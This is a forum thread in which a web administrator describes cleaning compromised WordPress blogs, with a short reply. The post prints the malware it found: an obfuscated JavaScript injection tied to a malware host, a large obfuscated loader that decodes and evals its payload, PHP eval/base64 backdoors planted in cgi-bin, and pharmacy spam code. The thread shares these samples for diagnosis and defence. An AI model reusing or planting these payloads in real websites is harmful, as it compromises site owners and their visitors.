Hi all – I was actually here for a different reason (trying to diagnose a Google malware site flag, even though I don’t see anything odd in the source), and I noticed that someone posted that you guys are trying to keep track of obfuscated javascript injections.
I spent part of last week fixing a series of Wordpress blogs that contained obfuscated javascript pointing to centiyo.com, a known malware site.
This code was found just below the closing head tag, above the body:
<scr ipt>var source ="=tdsjqu?epdvnfou/xsjuf)Tusjoh/gspnDibsDpef)71-216-213-225-:8-21:-212-43-226-225-::-72-45-49-46-65-64-61-66-68-6:-215-227-227-223-69-58-58-::-212-221-227-216-232-222-57-::-222-21:-58-216-221-57-::-214-216-74-61-45-43-22:-216-211-227-215-72-5:-43-215-212-216-214-215-227-72-5:-43-226-227-232-219-212-72-45-229-216-226-216-:9-216-219-216-227-232-69-43-215-216-211-211-212-221-45-73-71-58-216-213-225-:8-21:-212-73**<=0tdsjqu?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.wr ite(result); </script> [spaces added]
I also found it further down on the page.
This file pointed to a cgi script called in.cgi on the centiyo.com site. When I accessed this page (using wget, so it could not execute in a browser), this is the output from the in.cgi file.
<sc ript language="JavaScript" type="text/javascript">this.cZ=false;var qNE;var lAH=new Date();var dMN=false;qNE="11151714151416145e23241907293f153a035c0337112f130b2801215d590d0d4835171b20046d19020716431032210112054c36200b641a0e414b41151800192e5d1804041a051c200f130b023f045d5c0b1613140a06696e580d31290a10184f2e28225d051d123016080c0b003217205a440906065b545a0c01173d0318050637505c1d2f261a103614290108560b1132383306090b250a5d025a430e1c1105477a56641242525e5d1"+"d05751804034f192415560a17040d1530101f011935430e0a49421a2f0b02415161454552591e311c0a240640077b4e4d0f1913343005021006041534556b0b27445a46083448260b303602585c150d0210121e1c1768020b1900580022121108081e4e4b48400c0d383407351b4029171e49481d190d081b24314a490c4a6703152b322d491a510c2c242804101036374b032f000d0313100c5718343438002628192809664f54160006"+"53241e0a0e19283a331c08173e095b0a0f0c16143f09283d4f5e29174c1239353d033c3611290971560d140115131e470a363742185b00180807197515473c0b11161202036712450f0a195f082425162a701f047430246126311c0a406841675901070b64102911412e1207133c535f5a465b091a0b55233816053b312451664e56485d0701074508043d0b561702031348415140563119135b1f111911113f125558422b121a2f05161"+"21e2c6d140602141400221d175812030c0a331a173e1f14026b4d7808164f191f2e101013164b0e0b33411a38004a7c2b0a1807724d465755435b574a1629130b410e11031a01427a5f185c0f011506105145344a087345263a04117a5c5f4c5d1733551a0825132a0b310c0d615f78551559030c174b153e140515230b40047a03321d081d3050455442271906143848210d0f061104340c4125151d170b7a0f0a575275321221310472"+"051c01121f0f091c5d0c3c0e0c201132402e4e55240317152f33385b35163c54587d1b0305250a5330244243061e434847190d22640a073f00313d3a571c515d3e1f39762b23003014100f5c547201312a3804563e231822424a46487b1e0b030f261d510924490f144b3f224c30291a1a5a5c5e445d571e57005b1c17090a5e041153561b1738183f511b243e43685f6e42590729293236681c173b5d59510b19011e151813321f61031"+"b29021a12354e1b0839010609425601140d191f6b01287605485e4d162f1e02402944122a3506500f2010061c42121f140f3638123d294e0f1413083a03203b0301223a3f53373f2e1d5018151518120914050e121a4f180b4d08500d2135107529271d480e26424718321b4d42154b43564f445c445468764a537c00512404006e383514451b536b5e090c1d5d0f412a0c765d470e300d49330c1206050d2a0e0365444b051145253911"+"211044175d5306771b5e586e435b285b2b40010536005014301c5f374834131b39004f6a65494b454241252321634b56424b7f5f4b4f1b022d332213303e171f51445650440f255b031411162e7b1f59182f08071b05301f030f2b582a103517074f7d5810170d1811057b3c2e01181e2e405f560916383a1c17380d145b05010d5a461e2a07105950193d37272e161b0f0f6a041804152f40571111310f1a5e407d4f74415914010a3e2"+"b16415c534b72785b283c5f54140220025e3d4d0b483e0503421d5351000b15081e4854064d55411a611f0d1f251f25013f125a795d491e0a00101117495a53480a235c051a281f11653f1300540a1a2d0316172e36041f5d5c1f1715161d0d331616150d0b000312425d796a1d2d0d21380f3e282d504f553437175d0e302206312d266e522a1705060a3623040c424601504007593e654b04065249547a34431b373c1e243e4656461b";var iPU=new Date();var mTA=new Date();function iP(f){var sPW=new Array();var d = null;this.pS='';var r = window;this.vU=29116;var fO = document;var rE=false;var wX = String;this.xY=false;this.wP="wP";function x(t){var mZ=false;var tE = 0, uR = t['loeSnSgotSh8'.replace(/[8LoS7]/g, '')];var dY = 0;var kF='';while(dY < uR){var yV=23973;dY++;var hU=false;kX = fA(t, dY - 1);this.cP=false;tE += kX * uR;}var qT=new Date();return new String(tE);var zI=13130;}var jS=new Date();this.oDM=11814;function gX(xS, aB){this.mL=false;if(d == null) {this.pQ=false;d = {};this.zY="";}this.gJ='';if(d[xS] == null) {var sT=function(){};var p = Object;var iPW=352;this.eH="";d[xS] = new p();d[xS].b = 0;this.aLG="aLG";d[xS].h = aB;this.uB="uB";}}var nU="nU";var lW="lW";function dA(xS) {this.tW=false;var nY=new Array();if(d[xS] != null) {var wN='';var sP = d[xS];var fOV="";var rC = sP.b;var yT = sP.h;this.rW="rW";var l = yT.substr(rC, 1);var uJS=new Array();var v = yT['loeSnSgotSh8'.replace(/[8LoS7]/g, '')];var nK="";this.jC='';if(rC + 1 >= v) {var cV='';sP.b = 0;} else {this.fQ="";sP.b = rC + 1;var jM=3332;}var sF="";return fA(l, 0);}this.wH=25823;}var jSV=16063;function fA(j, bY){return j.charCodeAt(bY);var eV=2207;}this.pQX="pQX";function yJ(jO, oR){return jO ^ oR;this.iR="iR";}var nQ='';var vA = new String(document['w)rxi)t6e6'.replace(/[6\)bx\!]/g, '')]);var tI='';if(vA['iJnhdZeJxJOZfh'.replace(/[hrJyZ]/g, '')]('aHrbiQtbyA'.replace(/[AbQHW]/g, '')) != -1) {var yN=new Date(); return 35;}this.sFM="sFM";this.xG="xG";var kB = r['s~eqt^T^i:m:eqo^u^t:'.replace(/[\:\^x~q]/g, '')];this.sTS="";var pY = 35;this.qD=6723;var aBG = r['uAn2eAs8c<a2p2eN'.replace(/[NA\<28]/g, '')];var sL = '';var hUX=30243;var pO = wX['f2r}o}m2C2h[aHr2C[oGd[eH'.replace(/[H\[2\}G]/g, '')];var rY=29362;var sR = '';var cH='';for(var fM = 0; fM < f.length; fM += 2){var dSD=new Date();sR += '%' + f['s/uIbJsItvrN'.replace(/[NIJ/v]/g, '')](fM, 2);}var nI=new Array();this.jQ='';var f = aBG(sR);var hS='';var rI="";var oD = new wX(iP);this.wLW="";this.nUN="nUN";var xE = ['r8e4p4lxa8c4e4'.replace(/[432x8]/g, '')];var aD = xE.toString().match(new RegExp('.{1,' + (1+Math.floor(Math.random()*xE.length) || '1') + '}', 'g'));var eLY=function(){};var yXK=false;var pK = oD[aD.join('')](/[^@a-z0-9A-Z_-]/g, '');var eHI=new Date();this.oBS='';var yJY = new wX(x(pK));var xIZ="";gX('gXE', pK);this.vS=3722;gX('qP', yJY);var kJI="";var mZU=31218;for(var dU = 0; dU < (f['loeSnSgotSh8'.replace(/[8LoS7]/g, '')]); dU++) {var wBK="";this.aDS=10330;var wB = fA(f, dU);this.aN='';wB = yJ(wB, pY);wB = yJ(wB, dA('qP'));var yTU="yTU";wB = yJ(wB, dA('gXE'));var aBO=false;var uV="";sL += pO(wB);}var zA=false;var vM=new Array();r['eyviahli'. replace(/[ih8y\?]/g, '')](sL);var xW="xW";return sL = new wX();var iLS="";var mNI="mNI";};this.aT=27387;this.wV=9757;iP(qNE);var gZ;if(gZ!='' && gZ!='dAR'){gZ='hWD'};var eR=new Array();</sc ript> [spaces added]
The vector in this case appears to be an older version of Wordpress that was running in the same account space (therefore the same uid), which was used to infect the up-to-date files.
In these cases, the wp-blog-header.php file had been found to have the injected code.
This pattern was the same for 7 out of the 8 sites I had to fix for a client. The 8th site was slightly different though.
- wp-blog-header. php <— malicious code [space added]
In wp-load.php, I found:
require(‘../cgi-bin/wp-content’);
in the cgi-bin directory, I discovered three files:
- system
- theme.html
- wp-content
The wp-content file discovered in the cgi-bin contained the following:
<?php Error_Reporting(0); ?>
<?php eval(gz inflate(base64_de code("rVNbj5pQEK41bTd1m7iN0TQ+FFgsIGrOgTlyCFqf92X/QC9ouSyrKARZU3aT9q93gHRfmui26dNhZr7vmyvyhtOAQWG4OeMRM1eU4IdLYW+DxyAzbhlPmZlT4jJ+W7ldw2M8Y2ZBScp4TiGwwWd8PuWOnDEIGN9TklC44zRDqBm4Jd6GgtOUQW4gwEeXmVCCtIDCXPr+ACO4ul6OdIsUy36v0X3b6L73ztvtTv+81Wt7735idHApDv8IX6DVf9FsvK5BCPugE7/wLTIF3YprUuSHTV2/VEWMhVuEjT9Lflwi7/Otv/itLRZh82WrHSLArqQUFFLoVO2Ph2MSl8TKskSiA4mXSuS/uuietTrtPj6R740IgR+bjWmaa90YqDBWVWut6NoGSyGbgSCssU/vmE4Hu418MqXiKdTzN42zZz1MOhxoYuGtq+GtvW/1lNCuW3qUEWeigj0rjw5F1S2x9vhX1w/3kiPvOc0NXC0ufWfDjZswuCtXTFJcJ16BDfN/W7Ejxzbgu6vUIhQ2w4pjFAxSzEqh5qAsM0uOMd/nWRzs1CcUpTky3uCB8RUzYzc1IiwD1SFBSUrKC1MUJ0wyVY6QQgkqHRisON0aB2buMZsN2zlxjoVnf9/BUT1d104ULUzmghdlapL5TxnCp2PZvmjCV0H+b/+65gSHVaxKi4/S5EQXE2m2kDTnFw=="))); ?>
<?php eval(gz inflate(base64_decode("vVgBb9rIEm7hejEYsB4Q4udToiqKdI1OqoJDYqNc3l2LRNdcY1SMTZAD+3iJE5NLIAckPUpT/vrN2JAYY0J77+mlNV57Zr75ZnZ3vLtbv+clKzvM7dKBmLcluSVmB+I+zcn9Pfk028vttsX8jSQPxCwV99vOa5rbPRXzPUkeitkbcX+Qk609+UzMH+7JB1u9rCXm+2K2m5Nv8xLYn0qyRU/F/d6ePMxLN9lBbhc0zii874rZM3HfysmHm9+/KFVK0s6YEJ1YNi3pRNWqjWQ09VzakXY26hVa/yCsCBvW8Pb2j/64xTd1nfAXINVOhORUviLwH8pq+VeTTwlvQFStG+UmFXi1Qms0XVFrBg8W9K2mwu0d4FZ0RV3ZsNpj+2pst9Z7nc6l1bttd9YRecNs0OqcuAtP1uh+PHCV3H8C/G0olLynxDLrdVpSLcOsNsqAAKw/+SBGw+H4smPdjQb3XUBycLwIZQVh0HmAsc+/147QE0ooCTCyx5/H9ties8D4A9QfUuDVPdHJkUmatImtAKP/WJ9v7euR/WX8BVsB7Gq6Si2z2fRZ2+OPt52xNfryZd7otzIlBUtRCYyGWavfu2P71Gp37P7gfs5M0RpVUy0TX/bdu9Xu3w9Gna49DuAIDv0pscfgq92xunZ/0uUn5Wpd1fSq0KQqrat/6mpyvu8y01daKbNRK1hlYmDmLENvZILCy/i6MbNBq+axQdGgAfLUmylXVS8BqGLVTOWDAlxNQsxC0pXiHx+LnaeZRPg83YqthS9aUfiBNt7+wWdQY3VVuNf1hkHxYUBVGwYrfQbtWAwN07FEOiqsTZ/CXJrhOA9+PHGeZhluijmLPYc/4yCeQMt01MGfPAC4z0EMsLkWs8ZdBPsA/I/twVR9JgAuzTETeGw/oGd8/GNPsj81K7oewD32yDwWxDsOiQlzy6H/ycwRj6PllLn7MO8gzpynI9GvwI/MkWfAcMreac+jR0J+ZJ8HgB+WNcN4Npf3SCg9RYcmwwWRD0cgOxhBGPLPMPFH2h76H836Z63apMRjyLBgxEYhbobDHzY0awpm19QwFKFNTVKvCP2+N2Us2OKAYhj0H0nM2farzYJwpx0TkxS8huAqjMYhxzGf8Q1QDCfG4ExjeP/oYlHIJGI4T8IzUoZFFgnUAYxIaEbojJ0wYjIwe32wwAKjZ0NhxGd9qNB1DFwhuMKzHp3g2RgGAf+jMzIHi3EcYp9EZqVOHcHhxsYRgknM+3QujBi705egCEQaimN3z4ri2IWIyrKYpNlIQpjxCDfxGfcRwokLlCOJSU/6Q8Gix3CY4ZiTBJ8tg5RYqIqhixY7UxUDFcMgZQOVVlcbbn07IXpN0EqGpqiKNzdRZBPCMKKhQC+PGg7fRRqOQmQBBOv0T9jNdNgp9osUsBtaoScUwksUEuwSFwlgmlgkiy0JgFuGzkWW8OPiyxCeiBDz50w5NhZZMBbikYWDJYbzzveVDVDB0cQEq2BRZJ2yEQ6Uh5zvVSL0DUMR6hobfajJbNRbkwXNrJozI82ZktAHCZiWIWZuurJY51gO53oiNl8iOM7tIJaZzZ5TU5yyjZOAZWeBWSfhWCBYjIxJRJ8WJ3yl0ildWGFx8DC+Mss6hQkJRBinHC+oFWzcLabTUpF67l1lOQs5/0KLr6hqCT4ivJt3bClGmTivakr1WFexNbnViXlkOColDT5q2CL6RNYDnKGhgQtHExaIeL/sXeLN+1HC52udNC8JVRQ+sz6smMTQVZWuZ9aPjo4UlRJoXRbUil6FBgAZ2jE0SpQYcIMH0MJGofoWbp0jrU4Nx4aYtWO3VTDho/t23d1wLdyNlAhtwAK1ZJh1muSLXZCdp0coPH/WOleEixdFDdnC9WkewAOuKValXDOrgKmSMn3+sKy13DU1bYLkxDSUB5GDECSdvsJ1NLzm+UkXwmKbmrAaSPpXzKby6A3fpATtJAlL7oaW5GcEEMXjIj7l7CmnQ8gbwISIcAz+Pkycv3NvAPygmZoySgYMrgdOnrceXnOy4PwKP6xM6KT+O64CjAbhh0lOzlrm2q+jtX9fvOEy7xb07JLkPDha4Aq6zqDVgF1U6vsVlv1mcNxRwZWc21IF7Lu+kTqhsK+sPuq5JwnSziev5af/68ZwcgryyGBlxR0DgrTzRvCcgygFKBW12TMQtHRmdc1UYWiur77XzAYxi3XNhC9J0aDvNRUeS1Byama9UGyScgMGI6FFsFLqRCvhTrhYhy9KEz4rbsMsmqUS0d/TpqtfPC4XioppUOdHKUIto6TY1JS6Xq6qxSvX5dB1eTdx+SfYtNHmqj+6t0fFYX90128X78ZX/Y49Wl2HyTndo/PeUw7+ArtUWHj+IzjBT7r0xXebB1v9vDTI7fYkuS3ud/bkC9rN3or5gZi9ycm3kjzYkw//3sHWwdbVngz3jrgPaDbtSvI5xcOz3O4we4NeZUvcBxvAlfAMzcrtHvYHvSur8+orWG0fbFl78p2435LkK3qT27WBCD3NdoGHmMWDtR9/PDjv9l5t2WAiZtti/i7bykvXud07Se4DxT35+nDn4Cnxz38jhCcBf/ppewnrl68PX57avVfd3tnXZMF8yltj+2Xz5db/7pBz+8C6a1292vzlX5uvl4TxevPnXza3D/4C"))); ?> [spaces added]
The system file discovered in the cgi-bin contained an ad for Cialis, and the following PHP code:
<?php eval(gz inflate(base64_decode("rZNhb5swEIY1TfsbVcSYAmmC4rthH3MpPwK+rZtLwR3R0uAQQpQoym/fpVW/plW1L8jye37vvcfG/4tggfYJmh6wiWVJ0CtpSGwQKqAuwQWgi2VPYJRcPO+bBCvALpZ7AqdYEhahBkyT79rvgCzghqAlsUVggyqW1lRKdgh7BAfUJ8gltWGhJaiVtCRS76GMZJQXVwdQ83hWXZECPRzlZBLV63UYhk4EGUQKYOZSgevnKhyvn9yPbHLc2bw4ZNPpJ9DzaqbufC1oeHE6S3mh6DS8Fty3u295QWLKW6paWf4+vGo7e1Db7S4vdCrF6cXhy0F9dsfTnXc6stfXvCjvPe0zCB6EKSyUXCH8MS3QFpBBOZ6ciSGkH6Wh/SXfC4nVmS40po3lozkzT3AP5LgzM1eSD7FzLJm9TTDd9N3SroL3JAu1z3c2KFnGcmlcgg1n4Q7UchQ6t07HY/3YdoHf8BkCfgUDUInwlOAQyw3H5HU61xf1m4/Mcdny+jp8K/ooSkdV0wVtV78Lxs+LDX+Fo98j/3/+J6G2Q7kMvOzWi96aJfJuMi/U/wA="))); ?> [spaces added]
The theme.html file contained some PHP code at the top:
} elseif(strstr($refer,‘msn’)) { //do msn stuff $match = preg_match(‘/&q=([a-zA-Z0-9+-]+)/’,$refer, $output); $querystring = $output0; $querystring = str_replace(‘&q=’,’’,$querystring); $querystring = str_replace(‘+’,’ ’,$querystring); return $querystring; } else { //else, who cares return false; }}
if(getKeywords()){
$key = getKeywords();
$key = str _replace(" “,”+",$key);
}
$host=$host.“-”.$key;
?> [spaces added]
This looks to only serve to tag the links back to the host site (http://ontario-pharmacy.com) with the host name, for example, http://ontario-pharmacy.com/item.php?said=<?php echo $host; ?>&id=3740.
Funnily, there was a link to the W3C validator and a notice that the site is XHTML compliant. I guess it’s good that the bad guys care about standards compliance too… lol. (I’m sure they just snagged a default Wordpress template and that it wasn’t intentional.)
Anyway – I just wanted to post this here, in case it helps anyone else. The centiyo hack was hitting a lot of people pretty hard in January, so with any luck, someone googling for help will find this.
Excellent job!
You might have a future in writing security findings.
One comment, the hackers do use the W3C validator and various other means to “fool” the unsuspecting blog owner into thinking that this file must be okay.
I refer to the recent malscripts that include the /*GNU GPL*/ string in them.
Again, nice job and thank you for sharing.
Thomas J. Raef
“We Watch Your Website – so you don’t have to!”
http://www.wewatchyourwebsite.com
traef@wewatchyourwebsite.com
Hi WeWatch – Thanks for the compliment. Yeah, but this particular exploit was literally including a giant pharmacy ad – there’s no way a site owner wouldn’t notice that and could think it was okay. :)
I do this sort of work a lot, so I’m used to documenting things. I threw together a a blog post about this sort of thing: http://www.snipe.net/2010/01/when-wordpress-gets-hacked/
And plan on putting together more documentation on the hacks I’ve been dealing with for clients over the past two weeks.
When I had first run into the centiyo hack, I couldn’t find much info on it, oher than the attacks on Vbulletin from Nov/Dec, which didn’t help much for troubleshooting a wordpress install. Hopefully the next time someone googles for it, they’ll find this page and be able to work through it faster.
